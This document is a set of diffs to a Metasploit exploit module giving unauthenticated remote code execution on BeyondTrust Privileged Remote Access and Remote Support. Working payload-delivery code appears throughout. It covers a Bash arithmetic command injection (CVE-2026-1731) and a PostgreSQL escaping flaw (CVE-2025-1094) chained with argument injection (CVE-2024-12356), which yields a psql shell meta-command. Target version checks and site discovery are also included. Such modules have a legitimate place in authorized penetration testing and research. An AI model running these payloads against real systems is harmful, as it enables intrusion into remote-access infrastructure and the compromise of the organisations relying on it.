+          ['CVE', '2024-12356'], # The argument injection in BeyondTrust code. By default, this exploit does not leverage CVE-2024-12356.
+          ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
+          ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
+          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
+          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
         ],
-        'DisclosureDate' => '2026-02-06',
+        'DisclosureDate' => '2024-12-16',
         'Platform' => [ 'linux', 'unix' ],
         'Arch' => [ARCH_CMD],
         'Privileged' => false, # Executes as the site user.
         'Targets' => [
           [
-            'CVE-2026-1731 (Command Injection)', {
-              'Payload' => {
-                'DisableNops' => true,
-                # We are injecting into a Bash arithmetic evaluation: a[$(command)]0.
-                # We must avoid characters that break the subshell or the arithmetic structure.
-                'BadChars' => '[$()]'
-              }
-            }
-          ],
-          [
-            'CVE-2025-1094 (SQL Injection)', {
-              'Payload' => {
-                'DisableNops' => true,
-                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
-                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
-                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
-                'BadChars' => '\'"\\'
-              }
-            }
-          ],
-          [
-            'CVE-2025-1094 (SQLi) with CVE-2024-12356 (Argument Injection)', {
+            'Default', {
               'Payload' => {
                 'DisableNops' => true,
                 # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
@@ -108,80 +75,18 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options(
       [
         OptString.new('TargetCompanyName', [false, 'If set, use this name value to identify the company name of the deployed site. By default, this is auto discovered.']),
-        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.'])
+        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.']),
+        OptBool.new('LeverageCVE_2024_12356', [false, 'By default, this exploit does not leverage CVE-2024-12356. Enabling this option will cause this exploit to leverage CVE-2024-12356.', false])
       ]
     )
   end
 
   def check
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'get_rdf'),
-      'vars_get' => {
-        'comp' => 'sdcust',
-        'locale_code' => 'en-us'
-      }
-    )
+    product_version = get_version
+    return CheckCode::Unknown unless product_version
 
-    return CheckCode::Unknown('Connection failed') unless res
-
-    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200
-
-    # The HTTP content data will have something like this, followed by ~800Kb of string data:
-
-    # 00000000  30 20 53 75 63 63 65 73 73 66 75 6c 0a 65 6e 2d  |0 Successful.en-|
-    # 00000010  75 73 0a 31 37 33 37 33 36 38 38 37 32 0a 42 52  |us.1737368872.BR|
-    # 00000020  44 46 80 00 0a 91 07 81 32 34 2e 31 2e 32 00 82  |DF......24.1.2..|
-    # 00000030  00 00 00 00 67 8e 25 28 91 06 83 65 6e 2d 75 73  |....g.%(...en-us|
-
-    # First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we use a regex to match this so we can ignore it.
-
-    header = res.body.match(/^(0 Successful\n.+\n\d+\n)/)
-
-    return CheckCode::Unknown('Unexpected response header') unless header
-
-    # Extract the remainder of the data, after the "0 Successful\nLOCALE_ID\nTIMESTAMP\n" pre-amble.
-    brdf_data = res.body[header[1].length..]
-
-    # NOTE: Remote Support (RS) instances contain "Thank you for using BeyondTrust" in the BRDF data,
-    # but Privileged Remote Access (PRA) instances do not. So we can't use this check.
-
-    # Pull out the magic value (4 bytes), the first tag and its value (file version, 3 bytes), and then the second tag
-    # and its value (product version). The product version is encoded as a string, so has two tags, one for the
-    # string type (0x91) and the other for the tag type (0x81).
-    magic, _, _, prod_version_tag1, file_version_data_len, file_version_tag2 = brdf_data.unpack('NCvCCC')
-
-    # Inspect the data to ensure it looks like what we expect.
-
-    return CheckCode::Unknown('Unexpected header magic') unless magic == 0x42524446 # BRDF
-
-    return CheckCode::Unknown('Unexpected header prod_version_tag1') unless prod_version_tag1 == 0x91 # RDF_SMALL_SIZE
-
-    return CheckCode::Unknown('Unexpected header file_version_tag2') unless file_version_tag2 == 0x81 # RDF_PRODUCT_VERSION
-
-    product_version = brdf_data[10, file_version_data_len - 1]
-    version = Rex::Version.new(product_version)
-
-    # We cannot differentiate between the two affected products, Privileged Remote Access (PRA) and Remote Support (RS).
-    # However, they both share a common version number, and a common patch for this vulnerability.
-    #
-    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected for the older CVEs,
-    # and versions 25.3.1 (RS) / 24.3.4 (PRA) for CVE-2026-1731. We do not have a lower bound version number to test against.
-    #
-    # Note #2: The vendor supplied patches (BT24-10-ONPREM or BT26-02-ONPREM) to remediate the issues, in lieu of an
-    # updated product release. This patch does not change the products version number, so we cannot tell via a version
-    # based check if a target is actually vulnerable, therefore we can only report CheckCode::Appears.
-
-    if target.name.include? 'CVE-2026-1731'
-      # CVE-2026-1731: Vulnerable if RS (<= 25.3.1) OR PRA (<= 24.3.4)
-      # Since we can't distinguish, we flag if it matches the higher RS range.
-      is_vulnerable = version <= Rex::Version.new('25.3.1')
-    else
-      # Older CVEs: Both products were affected <= 24.3.1
-      is_vulnerable = version <= Rex::Version.new('24.3.1')
-    end
-
-    if is_vulnerable
+    product_version = Rex::Version.new(product_version)
+    if Rex::Version.new(product_version) <= Rex::Version.new('24.3.1')
       return CheckCode::Appears("Detected version #{product_version}")
     end
 
@@ -225,71 +130,51 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => headers
     )
 
-    if target.name.include? 'CVE-2026-1731'
-      vprint_status('Leveraging CVE-2026-1731 (Bash Arithmetic Evaluation Injection)...')
-      # The CVE-2026-1731 vulnerability is triggered during the arithmetic evaluation of the remoteVersion variable.
-      # We use a malicious string that triggers a subshell execution via Bash array index notation.
+    # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
+    # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
+    # version 2.
+    wsock.put_wstext("1\n")
 
-      # Use a random prefix for the arithmetic evaluation variable
-      prefix = Rex::Text.rand_text_alpha(rand(1..5))
-      # We use a random trailing number to maintain the arithmetic structure
-      suffix = rand(0..9)
+    # Transmit a random UUID value for the 'thin mint' cookie value.
+    wsock.put_wstext("#{SecureRandom.uuid}\n")
 
-      # The remoteVersion injection point
-      wsock.put_wstext("#{prefix}[$(#{payload.encoded})]#{suffix}\n")
+    # Transmit the auth type we want. Zero is the gskey auth type.
+    wsock.put_wstext("0\n")
 
-      # Complete the sequence with randomized dummy data to avoid static artifacts
-      wsock.put_wstext("#{SecureRandom.uuid}\n")     # remoteCookie
-      wsock.put_wstext("#{rand(0..2)}\n")            # remoteAuthType (usually 0, 1, or 2)
-      wsock.put_wstext("#{Rex::Text.rand_text_alpha(rand(4..8))}\n") # remoteGsKey
+    # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
+    # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
+    # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
+
+    if datastore['LeverageCVE_2024_12356']
+      vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
+
+      # Transmit the malicious gskey value and exploit the argument injection vulnerability.
+      # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
+      # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
+      # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
+      # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
+      # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
+      # a \! meta-command, we can execute and arbitrary shell command.
+      wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
     else
-      # CVE-2025-1094 / CVE-2024-12356
-      # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
-      # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
-      # version 2.
-      wsock.put_wstext("1\n")
+      vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
 
-      # Transmit a random UUID value for the 'thin mint' cookie value.
-      wsock.put_wstext("#{SecureRandom.uuid}\n")
-
-      # Transmit the auth type we want. Zero is the gskey auth type.
-      wsock.put_wstext("0\n")
-
-      # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
-      # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
-      # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
-
-      if target.name.include? 'CVE-2024-12356'
-        vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
-
-        # Transmit the malicious gskey value and exploit the argument injection vulnerability.
-        # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
-        # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
-        # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
-        # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
-        # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
-        # a \! meta-command, we can execute and arbitrary shell command.
-        wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
-      else
-        vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
-
-        # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
-        # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
-        wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
-      end
+      # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
+      # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
+      wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
     end
 
-    # The vendor patch BT24-10-ONPREM1 (and subsequent patches) will detect a malformed gskey value, and terminate the
-    # thin-scc-wrapper script early, tearing down the WebSocket connection. We can detect this here and warn the user
-    # that the target may actually be patched. As the patch does not change the servers version number, we cannot
-    # detect the patch via a version based check.
+    # The vendor patch BT24-10-ONPREM1 will detect a malformed gskey value, and terminate the thin-scc-wrapper script
+    # early, tearing down the WebSocket connection. We can detect this here and warn the user that the target may
+    # actually be patched. As the patch does not change the servers version number, we cannot detect the patch via a
+    # version based check.
     while wsock.has_read_data? datastore['WFSDELAY']
       frame = wsock.get_wsframe
 
       break if frame.nil?
 
       if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
-        print_warning('WebSocket closed unexpectedly! This may indicate that a patch has been applied, and the target is no longer vulnerable.')
+        print_warning('WebSocket closed unexpectedly! This indicates that the patch BT24-10-ONPREM1 has been applied, and the target is no longer vulnerable.')
         break
       end
     end
@@ -306,114 +191,4 @@ class MetasploitModule < Msf::Exploit::Remote
     raise
   end
 
-  # We need to know the target sites company name, or FQDN, in order to successfully establish a WebSocket connection.
-  # We first favor the user setting either the TargetCompanyName or TargetServerFQDN options. If not set we then try
-  # an undocumented API endpoint /get_mech_list, that should return the target site company name. Finally, we fall
-  # back on the /download_client_connector endpoint which will also report a servername and site FQDN.
-  def get_site_info
-    if !datastore['TargetCompanyName'].blank? || !datastore['TargetServerFQDN'].blank?
-      return {
-        company: datastore['TargetCompanyName'],
-        server: datastore['TargetServerFQDN']
-      }
-    end
-
-    site_info = get_site_info_via_mech_list
-
-    return site_info unless site_info.nil?
-
-    get_site_info_via_download_client_connector
-  end
-
-  # The internal undocumented API located at the /get_mech_list endpoint will return the company name
-  # of the target site. We try version=3 (JSON, newer instances) first, then fall back to version=2
-  # (semicolon-separated key=value pairs, for older instances such as 22.x where version=3 returns HTTP 500).
-  def get_site_info_via_mech_list
-    %w[3 2].each do |version|
-      opts = {
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'get_mech_list'),
-        'vars_get' => { 'version' => version }
-      }
-      opts['headers'] = { 'Accept' => 'application/json' } if version == '3'
-
-      res = send_request_cgi(opts)
-      next unless res&.code == 200
-
-      company = version == '3' ? parse_mech_list_json(res) : parse_mech_list_text(res)
-      next if company.blank?
-
-      vprint_status("Got site info via the /get_mech_list?version=#{version} endpoint.")
-      return { company: company, server: nil }
-    end
-
-    error('get_site_info_via_mech_list company not found.')
-  end
-
-  def parse_mech_list_json(res)
-    res.get_json_document['company']
-  end
-
-
-  # Parses semicolon-separated key=value pairs (e.g. "company=sewtest;product=ingredi").
-  def parse_mech_list_text(res)
-    res.body.split(';').each do |part|
-      part.strip!
-      return part.sub('company=', '') if part.start_with?('company=')
-    end
-    nil
-  end
-
-  def get_site_info_via_download_client_connector
-    res1 = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'download_client_connector'),
-      'vars_get' => {
-        'issue_menu' => '1'
-      }
-    )
-
-    return module_error('get_site_info Connection 1 failed.') unless res1
-
-    return module_error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
-
-    return module_error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
-
-    res2 = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
-    )
-
-    return module_error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
-
-    return module_error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
-
-    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
-
-    company = Rex::Text.html_decode(::Regexp.last_match(1))
-
-    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
-
-    servers = Rex::Text.html_decode(::Regexp.last_match(1))
-
-    servers_array = JSON.parse(servers)
-
-    return module_error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
-
-    return module_error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
-
-    server = servers_array.first
-
-    vprint_status('Got site info via the /download_client_connector endpoint.')
-
-    { company: company, server: server }
-  rescue JSON::ParserError
-    module_error('get_site_info_via_download_client_connector JSON parse error.')
-  end
-
-  # Helper method to print an error and then return nil.
-  def module_error(message)
-    print_error(message)
-    nil
-  end
 end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -173,14 +173,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # based check if a target is actually vulnerable, therefore we can only report CheckCode::Appears.
 
     if target.name.include? 'CVE-2026-1731'
-      # RS branch (25.x) vs PRA branch (24.x)
-      is_vulnerable = if version >= Rex::Version.new('25.0.0')
-                        version <= Rex::Version.new('25.3.1')
-                      else
-                        version <= Rex::Version.new('24.3.4')
-                      end
+      # CVE-2026-1731: Vulnerable if RS (<= 25.3.1) OR PRA (<= 24.3.4)
+      # Since we can't distinguish, we flag if it matches the higher RS range.
+      is_vulnerable = version <= Rex::Version.new('25.3.1')
     else
-      # Older CVEs (24.3.1 and below)
+      # Older CVEs: Both products were affected <= 24.3.1
       is_vulnerable = version <= Rex::Version.new('24.3.1')
     end
 

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -182,6 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
       is_vulnerable = version <= Rex::Version.new('25.3.1')
     else
       # Older CVEs: Both products were affected <= 24.3.1
+
       is_vulnerable = version <= Rex::Version.new('24.3.1')
     end
 
@@ -347,6 +348,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       company = version == '3' ? parse_mech_list_json(res) : parse_mech_list_text(res)
       next if company.blank?
+
 
       vprint_status("Got site info via the /get_mech_list?version=#{version} endpoint.")
       return { company: company, server: nil }

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -17,27 +17,61 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution',
         'Description' => %q{
           This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
-          Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
-          product site. This exploit targets PRA and RS versions 24.3.1 and below.
+          Access (PRA) and Remote Support (RS). It leverages three different vulnerabilities depending on the
+          user-selected target.
+
+          The default target leverages CVE-2026-1731, a direct command injection affecting RS versions 25.3.1
+          and prior, and PRA versions 24.3.4 and prior.
+
+          Alternatively, the module can leverage a chain of CVE-2025-1094 (SQL injection in PostgreSQL)
+          and CVE-2024-12356 (argument injection), affecting RS and PRA versions 24.3.1 and prior.
+
+          Exploitation occurs with the privileges of the site user of the targeted BeyondTrust product site.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'sfewer-r7' # Rapid7 Analysis and Metasploit module
+          'sfewer-r7', # Rapid7 Analysis and Metasploit module (CVE-2024-12356 / CVE-2025-1094)
+          'Harsh Jaiswal', # Discovery of CVE-2026-1731
+          'Jonah Burgess (CryptoCat)' # Added support for CVE-2026-1731
         ],
         'References' => [
-          ['CVE', '2024-12356'], # The argument injection in BeyondTrust code. By default, this exploit does not leverage CVE-2024-12356.
-          ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
-          ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
-          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
-          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
+          ['CVE', '2026-1731'], # Direct OS command injection in BeyondTrust
+          ['CVE', '2025-1094'], # SQL injection in PostgreSQL code
+          ['CVE', '2024-12356'], # Argument injection in BeyondTrust (may be combined with CVE-2025-1094)
+          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt26-02'], # Vendor advisory for CVE-2026-1731
+          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # Vendor advisory for CVE-2024-12356
+          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advisory for CVE-2025-1094
+          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis (CVE-2024-12356 / CVE-2025-1094)
+          ['URL', 'https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis'] # Rapid7 Analysis (CVE-2026-1731)
         ],
-        'DisclosureDate' => '2024-12-16',
+        'DisclosureDate' => '2026-02-06',
         'Platform' => [ 'linux', 'unix' ],
         'Arch' => [ARCH_CMD],
         'Privileged' => false, # Executes as the site user.
         'Targets' => [
           [
-            'Default', {
+            'CVE-2026-1731 (Command Injection)', {
+              'Payload' => {
+                'DisableNops' => true,
+                # We are injecting into a Bash arithmetic evaluation: a[$(command)]0.
+                # We must avoid characters that break the subshell or the arithmetic structure.
+                'BadChars' => '[$()]'
+              }
+            }
+          ],
+          [
+            'CVE-2025-1094 (SQL Injection)', {
+              'Payload' => {
+                'DisableNops' => true,
+                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
+                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
+                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
+                'BadChars' => '\'"\\'
+              }
+            }
+          ],
+          [
+            'CVE-2025-1094 (SQLi) with CVE-2024-12356 (Argument Injection)', {
               'Payload' => {
                 'DisableNops' => true,
                 # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
@@ -74,8 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options(
       [
         OptString.new('TargetCompanyName', [false, 'If set, use this name value to identify the company name of the deployed site. By default, this is auto discovered.']),
-        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.']),
-        OptBool.new('LeverageCVE_2024_12356', [false, 'By default, this exploit does not leverage CVE-2024-12356. Enabling this option will cause this exploit to leverage CVE-2024-12356.', false])
+        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.'])
       ]
     )
   end
@@ -127,17 +160,31 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Unexpected header file_version_tag2') unless file_version_tag2 == 0x81 # RDF_PRODUCT_VERSION
 
     product_version = brdf_data[10, file_version_data_len - 1]
+    version = Rex::Version.new(product_version)
 
     # We cannot differentiate between the two affected products, Privileged Remote Access (PRA) and Remote Support (RS).
     # However, they both share a common version number, and a common patch for this vulnerability.
     #
-    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected, so we do not have a lower
-    # bound version number to test against.
+    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected for the older CVEs,
+    # and versions 25.3.1 (RS) / 24.3.4 (PRA) for CVE-2026-1731. We do not have a lower bound version number to test against.
     #
-    # Note #2: The vendor supplied a patch (BT24-10-ONPREM1 or BT24-10-ONPREM2) to remediate the issue, in lieu of an
+    # Note #2: The vendor supplied patches (BT24-10-ONPREM or BT26-02-ONPREM) to remediate the issues, in lieu of an
     # updated product release. This patch does not change the products version number, so we cannot tell via a version
     # based check if a target is actually vulnerable, therefore we can only report CheckCode::Appears.
-    if Rex::Version.new(product_version) <= Rex::Version.new('24.3.1')
+
+    if target.name.include? 'CVE-2026-1731'
+      # RS branch (25.x) vs PRA branch (24.x)
+      is_vulnerable = if version >= Rex::Version.new('25.0.0')
+                        version <= Rex::Version.new('25.3.1')
+                      else
+                        version <= Rex::Version.new('24.3.4')
+                      end
+    else
+      # Older CVEs (24.3.1 and below)
+      is_vulnerable = version <= Rex::Version.new('24.3.1')
+    end
+
+    if is_vulnerable
       return CheckCode::Appears("Detected version #{product_version}")
     end
 
@@ -181,44 +228,64 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => headers
     )
 
-    # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
-    # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
-    # version 2.
-    wsock.put_wstext("1\n")
+    if target.name.include? 'CVE-2026-1731'
+      vprint_status('Leveraging CVE-2026-1731 (Bash Arithmetic Evaluation Injection)...')
+      # The CVE-2026-1731 vulnerability is triggered during the arithmetic evaluation of the remoteVersion variable.
+      # We use a malicious string that triggers a subshell execution via Bash array index notation.
 
-    # Transmit a random UUID value for the 'thin mint' cookie value.
-    wsock.put_wstext("#{SecureRandom.uuid}\n")
+      # Use a random prefix for the arithmetic evaluation variable
+      prefix = Rex::Text.rand_text_alpha(rand(1..5))
+      # We use a random trailing number to maintain the arithmetic structure
+      suffix = rand(0..9)
 
-    # Transmit the auth type we want. Zero is the gskey auth type.
-    wsock.put_wstext("0\n")
+      # The remoteVersion injection point
+      wsock.put_wstext("#{prefix}[$(#{payload.encoded})]#{suffix}\n")
 
-    # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
-    # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
-    # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
-
-    if datastore['LeverageCVE_2024_12356']
-      vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
-
-      # Transmit the malicious gskey value and exploit the argument injection vulnerability.
-      # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
-      # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
-      # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
-      # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
-      # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
-      # a \! meta-command, we can execute and arbitrary shell command.
-      wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
+      # Complete the sequence with randomized dummy data to avoid static artifacts
+      wsock.put_wstext("#{SecureRandom.uuid}\n")     # remoteCookie
+      wsock.put_wstext("#{rand(0..2)}\n")            # remoteAuthType (usually 0, 1, or 2)
+      wsock.put_wstext("#{Rex::Text.rand_text_alpha(rand(4..8))}\n") # remoteGsKey
     else
-      vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
+      # CVE-2025-1094 / CVE-2024-12356
+      # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
+      # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
+      # version 2.
+      wsock.put_wstext("1\n")
 
-      # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
-      # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
-      wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
+      # Transmit a random UUID value for the 'thin mint' cookie value.
+      wsock.put_wstext("#{SecureRandom.uuid}\n")
+
+      # Transmit the auth type we want. Zero is the gskey auth type.
+      wsock.put_wstext("0\n")
+
+      # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
+      # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
+      # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
+
+      if target.name.include? 'CVE-2024-12356'
+        vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
+
+        # Transmit the malicious gskey value and exploit the argument injection vulnerability.
+        # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
+        # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
+        # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
+        # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
+        # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
+        # a \! meta-command, we can execute and arbitrary shell command.
+        wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
+      else
+        vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
+
+        # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
+        # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
+        wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
+      end
     end
 
-    # The vendor patch BT24-10-ONPREM1 will detect a malformed gskey value, and terminate the thin-scc-wrapper script
-    # early, tearing down the WebSocket connection. We can detect this here and warn the user that the target may
-    # actually be patched. As the patch does not change the servers version number, we cannot detect the patch via a
-    # version based check.
+    # The vendor patch BT24-10-ONPREM1 (and subsequent patches) will detect a malformed gskey value, and terminate the
+    # thin-scc-wrapper script early, tearing down the WebSocket connection. We can detect this here and warn the user
+    # that the target may actually be patched. As the patch does not change the servers version number, we cannot
+    # detect the patch via a version based check.
     while wsock.has_read_data? datastore['WFSDELAY']
       frame = wsock.get_wsframe
 
@@ -273,6 +340,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
       opts['headers'] = { 'Accept' => 'application/json' } if version == '3'
 
+
       res = send_request_cgi(opts)
       next unless res&.code == 200
 
@@ -285,6 +353,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     error('get_site_info_via_mech_list company not found.')
   end
+
 
   def parse_mech_list_json(res)
     res.get_json_document['company']
@@ -308,34 +377,34 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    return error('get_site_info Connection 1 failed.') unless res1
+    return module_error('get_site_info Connection 1 failed.') unless res1
 
-    return error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
+    return module_error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
 
-    return error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
+    return module_error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
 
     res2 = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
     )
 
-    return error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
+    return module_error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
 
-    return error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
+    return module_error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
 
-    return error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
+    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
 
     company = Rex::Text.html_decode(::Regexp.last_match(1))
 
